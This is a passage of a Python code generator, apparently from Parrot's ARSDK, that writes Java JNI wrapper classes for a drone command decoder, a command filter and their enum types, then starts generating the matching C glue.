jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if ((!valid) || (command == null) || (!command.isValid())) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeDecode (pointer, command.getData(), command.getDataSize());\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Decodes a command calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @param command command to decode.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode (long data, int size) {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeDecode (pointer, data, size);\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
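    # One listener field and setter per command.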
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private ' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + ';\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
            jfile.write ('     * Listeners are set per decoder instance\n')
            #~ jfile.write ('     * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n')
jfile.write (' */\n')
jfile.write (' public void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n')
jfile.write (' ' + interfaceVar (ftr, cmd) + ' = ' + interfaceVar (ftr, cmd) + '_PARAM;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
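    # Dispatch methods: forward each decoded command to its listener when one is set.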
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' void ' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (') {\n')
jfile.write (' if(' + interfaceVar (ftr, cmd) + ' != null) {\n')
jfile.write (' ' + interfaceVar (ftr, cmd) + '.' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (arg.name)
jfile.write (');\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* **************** */\n')
jfile.write (' /* NATIVE FUNCTIONS */\n')
jfile.write (' /* **************** */\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Memory allocation in native memory space<br>\n')
jfile.write (' * Allocates a decoder and return its C-Pointer\n')
jfile.write (' * @return C-Pointer on the decoder, or 0 (C-NULL) if the alloc failed\n')
jfile.write (' */\n')
jfile.write (' private native long nativeNewDecoder ();\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Memory release in native memory space<br>\n')
jfile.write (' * Frees a decoder from its C-Pointer<br>\n')
    jfile.write ('     * This call is needed because the JVM does not know about native memory allocs\n')
jfile.write (' * @param decoder C-Pointer on the decoder to free\n')
jfile.write (' */\n')
jfile.write (' private native void nativeDeleteDecoder (long decoder);\n')
jfile.write ('\n')
jfile.write (' private native int nativeDecode (long jdecoder, long jpdata, int jdataSize);\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.write ('\n')
jfile.close ()
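    # Filter class: wraps a native filter and exposes per-feature, per-class and per-command behavior setters.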
jfile = open (paths.JNI_FILTER_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java implementation of a C ' + JNIFilterClassName + ' object.<br>\n')
jfile.write (' * @author Parrot (c) 2014\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIFilterClassName + '\n')
jfile.write ('{\n')
jfile.write (' private long cFilter;\n')
jfile.write (' private boolean valid;\n')
jfile.write (' private static final String TAG = ' + JNIFilterClassName + '.class.getSimpleName();\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIFilterClassName + ' which allows all commands.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIFilterClassName + ' () {\n')
jfile.write (' this(ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ALLOWED);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIFilterClassName + ' with the given default behavior.\n')
jfile.write (' * @param behavior The default behavior of the filter.\n')
    jfile.write ('     * @warning Only ALLOWED and BLOCKED are allowed as default behavior. Providing any other value will create an invalid object.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIFilterClassName + ' (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' this.cFilter = nativeNewFilter (behavior.getValue());\n')
jfile.write (' this.valid = (this.cFilter != 0);\n')
jfile.write (' if (! this.valid) {\n')
jfile.write (' dispose();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Checks the object validity.\n')
jfile.write (' * @return <code>true</code> if the object is valid<br><code>false</code> if the object is invalid.\n')
jfile.write (' */\n')
jfile.write (' public boolean isValid () {\n')
jfile.write (' return valid;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Marks a ' + JNIFilterClassName + ' as unused (so C-allocated memory can be freed)<br>\n')
jfile.write (' * A disposed ' + JNIFilterClassName + ' is marked as invalid.\n')
jfile.write (' */\n')
jfile.write (' public void dispose () {\n')
jfile.write (' if (valid) {\n')
jfile.write (' nativeDeleteFilter (cFilter);\n')
jfile.write (' }\n')
jfile.write (' this.valid = false;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Gets the native pointer for this filter\n')
jfile.write (' * @return The pointer.\n')
jfile.write (' */\n')
jfile.write (' public long getFilter () {\n')
jfile.write (' return cFilter;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' protected void finalize () throws Throwable {\n')
jfile.write (' try {\n')
jfile.write (' if (valid) {\n')
jfile.write (' ARSALPrint.e (TAG, this + ": Finalize error -> dispose () was not called !");\n')
jfile.write (' dispose ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write (' finally {\n')
jfile.write (' super.finalize ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Filters a command.<br>\n')
jfile.write (' * This function returns the filter behavior for the given ' + JNIClassName + '.<br>\n')
jfile.write (' * @param command The command to be filtered.\n')
jfile.write (' * @return The filter status.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_STATUS_ENUM filterCommand (' + JNIClassName + ' command) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ERROR; }\n')
jfile.write (' int cStatus = nativeFilterCommand (cFilter, command.getData(), command.getDataSize());\n')
jfile.write (' return ARCOMMANDS_FILTER_STATUS_ENUM.getFromValue(cStatus);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' private native long nativeNewFilter (int behavior);\n')
jfile.write (' private native void nativeDeleteFilter (long cFilter);\n')
jfile.write (' private native int nativeFilterCommand (long cFilter, long command, int len);\n')
jfile.write ('\n')
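    # Behavior setters, mirroring the C ARCOMMANDS_Filter_SetXxxBehavior functions.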
for ftr in allFeatures:
jfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.XXX.XXX.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
        if ftr.classes: # project only
for cl in ftr.classes:
jfile.write (' // - Class ' + cl.name + '\n')
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.XXX.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
for cmd in cl.cmds:
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.' + ARCapitalize(cmd.name) + '.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
else:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cmd.name) + '.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.close ()
# Generate java enums type
for ftr in allFeatures:
for enum in ftr.enums:
oldEnumValFrm = False if ftr.classes == None else True
CLASS_NAME = ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), enum.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
UNKNOWN_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'UNKNOWN') if ftr.classes == None else 'e'+AREnumValue(LIB_MODULE, get_ftr_old_name(ftr), enum.name,'UNKNOWN_ENUM_VALUE')
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('import java.util.HashMap;\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), enum.name) + ' enum\n')
jfile.write(' */\n')
jfile.write('public enum ' + CLASS_NAME + ' {\n')
jfile.write(' /** Dummy value for all unknown cases */\n')
jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n')
previousVal = -1
for eVal in enum.values:
val = eVal.value if eVal.value is not None else previousVal +1
previousVal = int(val)
jfile.write(' ')
if eVal.doc:
jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ')
if eVal.doc:
jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")')
else:
jfile.write(ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm) + ' (' + str(val) + ')')
#If it is the last value of a feature enum.
if ftr.classes == None and eVal == enum.values[-1]:
jfile.write(';\n')
else:
jfile.write(',\n')
# Add MAX value only if it is an old enum.
if ftr.classes:
MAX_VALUE = ARJavaEnumValDef(LIB_MODULE, get_ftr_old_name(ftr), enum.name, 'MAX', oldEnumValFrm)
jfile.write(' ' + MAX_VALUE + ' ('+ str(previousVal + 1) +');\n')
jfile.write('\n')
jfile.write('\n')
jfile.write(' private final int value;\n')
jfile.write(' private final String comment;\n');
jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = null;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = comment;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the int value of the enum\n')
jfile.write(' * @return int value of the enum\n')
jfile.write(' */\n')
jfile.write(' public int getValue () {\n')
jfile.write(' return value;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n')
jfile.write(' * @param value C value of the enum\n')
jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n')
jfile.write(' */\n')
jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n')
jfile.write(' if (null == valuesList) {\n')
jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n')
jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n')
jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n')
jfile.write(' valuesList.put (entry.getValue (), entry);\n')
jfile.write(' }\n')
jfile.write(' }\n')
jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n')
jfile.write(' if (retVal == null) {\n')
jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n')
jfile.write(' }\n')
jfile.write(' return retVal;')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Returns the enum comment as a description string\n')
jfile.write(' * @return The enum description\n')
jfile.write(' */\n')
jfile.write(' public String toString () {\n')
jfile.write(' if (this.comment != null) {\n')
jfile.write(' return this.comment;\n')
jfile.write(' }\n')
jfile.write(' return super.toString ();\n')
jfile.write(' }\n')
jfile.write('}\n')
jfile.close()
for multiset in ftr.multisets:
oldEnumValFrm = False if ftr.classes == None else True
CLASS_NAME = ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), multiset.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), multiset.name) + '\n')
jfile.write(' */\n')
jfile.write('public class ' + CLASS_NAME + ' {\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' private static class ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' {\n')
jfile.write(' public int isSet;\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name + ';\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' public ' + CLASS_NAME + ' () {\n')
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' private final ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' = new ' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '();\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' public void set' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ' (')
isFirst = True
for multiset_msg_arg in multiset_msg.args:
if not isFirst:
jfile.write(', ')
isFirst = False
jfile.write( xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' ' + multiset_msg_arg.name )
jfile.write(') {\n')
jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet = 1;\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write( ' _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+' = ' + multiset_msg_arg.name+';\n' )
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg in multiset.msgs:
jfile.write(' public int get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + 'IsSet () {\n')
jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.isSet;\n')
jfile.write(' }\n')
jfile.write('\n')
for multiset_msg_arg in multiset_msg.args:
jfile.write(' public '+ xmlToJava(LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) +' get' + ARCapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + ARCapitalize(multiset_msg_arg.name) +' () {\n')
jfile.write( ' return _' + ARUncapitalize(multiset_msg.ftr.name) + ARCapitalize(multiset_msg.name) + '.'+multiset_msg_arg.name+';\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write('}\n')
jfile.close()
# Generate java enums
#enumDecErr = ArEnum(DEC_SUBMODULE+'_'+DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function')
enumDecErr = ArEnum(DEC_ERR_ENAME, 'Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function')
enumDecErr.values.append(ArEnumValue('OK', 0, 'No error occurred'))
enumDecErr.values.append(ArEnumValue('NO_CALLBACK', 1, 'No error, but no callback was set (so the call had no effect)'))
enumDecErr.values.append(ArEnumValue('UNKNOWN_COMMAND', 2, 'The command buffer contained an unknown command'))
enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_DATA', 3, 'The command buffer did not contain enough data for the specified command'))
enumDecErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 4, 'The string buffer was not big enough for the command description'))
enumDecErr.values.append(ArEnumValue('ERROR', 5, 'Any other error'))
#enumFilterErr = ArEnum(FIL_SUBMODULE+'_'+FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.')
enumFilterErr = ArEnum(FIL_ERROR_ENAME, 'Error code for ARCOMMANDS_Filter functions.')
enumFilterErr.values.append(ArEnumValue('OK', 0,'No error.'))
enumFilterErr.values.append(ArEnumValue('ALLOC', 1,'Memory allocation error.'))
enumFilterErr.values.append(ArEnumValue('BAD_STATUS', 2,'The given status is not a valid status.'))
enumFilterErr.values.append(ArEnumValue('BAD_FILTER', 3,'The given filter is not a valid filter.'))
enumFilterErr.values.append(ArEnumValue('BAD_BUFFER', 4,'The given buffer is not a valid buffer.'))
enumFilterErr.values.append(ArEnumValue('OTHER', 5,'Any other error.'))
#enumFilterStatus = ArEnum(FIL_SUBMODULE+'_'+FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function')
enumFilterStatus = ArEnum(FIL_STATUS_ENAME,'Status code for ' + ARFunctionName (LIB_MODULE, FIL_SUBMODULE, 'FilterCommand') + ' function')
enumFilterStatus.values.append(ArEnumValue('ALLOWED', 0,'The command should pass the filter'))
enumFilterStatus.values.append(ArEnumValue('BLOCKED', 1,'The command should not pass the filter'))
enumFilterStatus.values.append(ArEnumValue('UNKNOWN', 2,'Unknown command. The command was possibly added in a newer version of libARCommands, or is an invalid command.'))
enumFilterStatus.values.append(ArEnumValue('ERROR', 3, 'The filtering of the command failed.'))
#enumGenErr = ArEnum(GEN_SUBMODULE+'_'+GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions')
enumGenErr = ArEnum(GEN_ERR_ENAME,'Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions')
enumGenErr.values.append(ArEnumValue( 'OK', 0,'No error occurred'))
enumGenErr.values.append(ArEnumValue('BAD_ARGS', 1, 'At least one of the arguments is invalid'))
enumGenErr.values.append(ArEnumValue('NOT_ENOUGH_SPACE', 2, 'The given output buffer was not large enough for the command'))
enumGenErr.values.append(ArEnumValue('ERROR', 3, 'Any other error'))
enums = [enumDecErr, enumFilterErr, enumFilterStatus, enumGenErr]
subModules = [DEC_SUBMODULE, FIL_SUBMODULE, FIL_SUBMODULE, GEN_SUBMODULE]
for enum in enums:
submodule = subModules[enums.index(enum)]
#CLASS_NAME = LIB_MODULE.upper () + submodule.upper() + '_' + enum.name.upper () + '_ENUM'
CLASS_NAME = ARJavaEnumType (LIB_MODULE, submodule, enum.name)
JFILE_NAME = paths.JNIJ_OUT_DIR + CLASS_NAME + '.java'
UNKNOWN_VALUE = 'e'+ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, 'UNKNOWN_ENUM_VALUE', True)
jfile = open(JFILE_NAME, 'w')
jfile.write(LICENCE_HEADER)
jfile.write('\n')
jfile.write('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write('\n')
jfile.write('import java.util.HashMap;\n')
jfile.write('\n')
jfile.write('/**\n')
jfile.write(' * Java copy of the ' + AREnumName (LIB_MODULE, submodule, enum.name) + ' enum\n')
jfile.write(' */\n')
jfile.write('public enum ' + CLASS_NAME + ' {\n')
jfile.write(' /** Dummy value for all unknown cases */\n')
jfile.write(' ' + UNKNOWN_VALUE + ' (Integer.MIN_VALUE, "Dummy value for all unknown cases"),\n')
previousVal = -1
for eVal in enum.values:
val = eVal.value if eVal.value is not None else previousVal +1
previousVal = int(val)
jfile.write(' ')
if eVal.doc:
jfile.write('/** '+eVal.doc.replace('\n', ' ')+' */\n ')
if eVal.doc:
jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True)+ ' (' + str(val)+ ', "'+eVal.doc.replace('\n', ' ')+'")')
else:
jfile.write(ARJavaEnumValDef(LIB_MODULE, submodule, enum.name, eVal.name, True) + ' (' + str(val) + ')')
#If it is the last value of the enum.
if eVal == enum.values[-1]:
jfile.write(';\n')
else:
jfile.write(',\n')
jfile.write('\n')
jfile.write(' private final int value;\n')
jfile.write(' private final String comment;\n');
jfile.write(' static HashMap<Integer, ' + CLASS_NAME + '> valuesList;\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = null;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' ' + CLASS_NAME + ' (int value, String comment) {\n')
jfile.write(' this.value = value;\n')
jfile.write(' this.comment = comment;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the int value of the enum\n')
jfile.write(' * @return int value of the enum\n')
jfile.write(' */\n')
jfile.write(' public int getValue () {\n')
jfile.write(' return value;\n')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Gets the ' + CLASS_NAME + ' instance from a C enum value\n')
jfile.write(' * @param value C value of the enum\n')
jfile.write(' * @return The ' + CLASS_NAME + ' instance, or null if the C enum value was not valid\n')
jfile.write(' */\n')
jfile.write(' public static ' + CLASS_NAME + ' getFromValue (int value) {\n')
jfile.write(' if (null == valuesList) {\n')
jfile.write(' ' + CLASS_NAME + ' [] valuesArray = ' + CLASS_NAME + '.values ();\n')
jfile.write(' valuesList = new HashMap<Integer, ' + CLASS_NAME + '> (valuesArray.length);\n')
jfile.write(' for (' + CLASS_NAME + ' entry : valuesArray) {\n')
jfile.write(' valuesList.put (entry.getValue (), entry);\n')
jfile.write(' }\n')
jfile.write(' }\n')
jfile.write(' ' + CLASS_NAME + ' retVal = valuesList.get (value);\n')
jfile.write(' if (retVal == null) {\n')
jfile.write(' retVal = ' + UNKNOWN_VALUE + ';\n')
jfile.write(' }\n')
jfile.write(' return retVal;')
jfile.write(' }\n')
jfile.write('\n')
jfile.write(' /**\n')
jfile.write(' * Returns the enum comment as a description string\n')
jfile.write(' * @return The enum description\n')
jfile.write(' */\n')
jfile.write(' public String toString () {\n')
jfile.write(' if (this.comment != null) {\n')
jfile.write(' return this.comment;\n')
jfile.write(' }\n')
jfile.write(' return super.toString ();\n')
jfile.write(' }\n')
jfile.write('}\n')
jfile.close()
def jni_generateCmds(ctx, paths):
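# Generate the JNI C glue for libARCommands: the native toString helpers (JNI_CFILE),
# the decoder callbacks that forward decoded commands to Java (JNI_DECODER_CFILE),
# and the filter wrappers (JNI_FILTER_CFILE).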
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.JNI_DIR):
os.makedirs (paths.JNI_DIR)
if not os.path.exists (paths.JNIC_DIR):
os.makedirs (paths.JNIC_DIR)
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
elif isinstance(arg.argType, ArMultiSetting):
hasArgOfType[ArArgType.MULTISETTING] = True
